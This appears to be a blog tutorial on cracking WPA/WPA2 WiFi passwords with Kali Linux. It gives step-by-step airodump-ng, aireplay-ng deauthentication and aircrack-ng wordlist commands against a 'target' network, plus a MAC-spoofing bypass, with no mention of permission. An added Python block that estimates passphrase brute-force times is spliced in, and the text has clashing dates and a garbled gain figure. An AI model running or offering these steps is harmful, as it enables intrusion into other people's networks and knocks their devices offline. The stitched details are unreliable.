How To Crack Wpa Wpa2 Wifi

July 17, 2015 by admin

This video is intended to show you how to crack WPA/WPA2 WiFi using Kali Linux.
Cracking a WPA/WPA2 wireless network can take some time using a CPU, as we will be doing in this video. A faster way would be to use hashcat on a GPU; the problem is you kind of need a really good GPU to do it. That's just the way I feel, I might be wrong though! You will need Kali Linux.



You will need a compatible wireless card. I recommend these compatible wireless cards:
Alfa Networks AWUS036H - Works!
Alfa Network AWUS036NH - Untested!
TP-LINK TL-WN722N - Works!
Getting a low signal to the target network?
Order a WiFi signal amplifier. Signal gain could be increased by -20 dBi.

Let's get started!

First we need to find out which wireless cards are connected by typing:
00:53
iwconfig
Next we need to bring our wireless card down:
1:15
ifconfig wlan0 down
Once our wireless card is down we need to run the command:
1:22
airodump-ng wlan0
This will show us all the wireless networks within range.
Let airodump-ng run until you find the target network.
2:00 When you have found the target network, press CTRL+C to stop airodump-ng.
We need to remember the BSSID and the channel the target network is on.
2:17
airodump-ng -c 1 --bssid BC:F6:85:BF:4F:70 -w filename wlan0
Replace 1 with your target's channel and replace BC:F6:85:BF:4F:70 with your target's BSSID.
You honestly should replace filename with the target's ESSID name for each network you target.
2:50 The airodump-ng command is just listening to connections on the target router.
We need a MAC address to show up under STATION. If nothing shows up under STATION we can't go any further in the steps: a device needs to be connected to the target network over wireless so we can deauth it and capture the 4-way handshake.
3:16 We run the aireplay-ng command to deauth a client connected to the target network:
aireplay-ng -0 1 -a BC:F6:85:BF:4F:70 -c D8:50:E6:84:6C:74 wlan0
-0 is the deauth attack. 1 = number of deauths to send to the connected target. -a = BSSID of the target network. -c = MAC address of the target listed under STATION.
5:09 WPA handshake captured!
5:48
aircrack-ng -w /path/to/wordlist /path/to/capfile-01.cap
Since we're using our CPU this can take some time depending on how big your wordlist is, and you might not even get the wireless password if it's not in the wordlist. If this attack fails, try a WPS attack; a pixiewps attack might work, but not always.
6:25 WPA password cracked! KEY FOUND!
6:40 We need to put the card back into managed mode, but first we need to run:
7:01
ifconfig wlan0 down
Then run:
7:11
iwconfig wlan0 mode managed
Next we need to bring the wireless card back up since it's down:
7:16
ifconfig wlan0 up
Find the target network and connect to it using the password you got, if you cracked it.
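The reason the aircrack-ng step above is slow, and the reason a passphrase that is not in the wordlist is never found, is that WPA2-Personal stretches the passphrase into the PMK with PBKDF2 (4096 HMAC-SHA1 rounds, salted with the SSID). The following added example, which is not part of the original post, derives a PMK against the published IEEE 802.11i known-answer vector and estimates, from this machine's own derivation rate, how long an exhaustive search of different passphrase lengths would take; the SSID and passphrase labels are constructed for the demo.

```python
import hashlib
import time

# WPA2-Personal never uses the passphrase directly: the 256-bit PMK is
# PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
# Every candidate in a wordlist attack has to pay for those 4096 rounds.
def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)

def measure_guess_rate(ssid: str = "ExampleNet", rounds: int = 20) -> float:
    """Derive `rounds` PMKs and return this core's derivations per second (constructed inputs)."""
    start = time.perf_counter()
    for i in range(rounds):
        wpa2_pmk(f"sample-passphrase-{i}", ssid)
    return rounds / (time.perf_counter() - start)

def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidates for a uniformly random passphrase of this alphabet and length."""
    return alphabet_size ** length

def years_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try the whole keyspace at a fixed guess rate."""
    return keyspace(alphabet_size, length) / guesses_per_second / (365 * 24 * 3600)

if __name__ == "__main__":
    # Known-answer vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
    print("PMK:", wpa2_pmk("password", "IEEE").hex())
    rate = measure_guess_rate()
    print(f"this CPU core: about {rate:,.0f} PMK derivations per second")
    # A GPU rig is orders of magnitude faster than one core, so size the passphrase
    # so that even a very large speed-up does not bring the search into reach.
    for label, alphabet, length in [("8 lowercase letters", 26, 8),
                                    ("12 letters and digits", 62, 12),
                                    ("20 printable ASCII", 95, 20)]:
        print(f"{label:22s}: {years_to_exhaust(alphabet, length, rate):.3g} years worst case")
```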

If you're unable to connect to the network and the password is 100% correct, it's very possible the target has MAC address filtering enabled, so only MAC addresses in an allow list can connect. This is extra security some people use, but it's a simple bypass if you spoof your MAC address with that of a connected client.

Last edited by Matthew Knight on July 15, 2015 at 1:45 am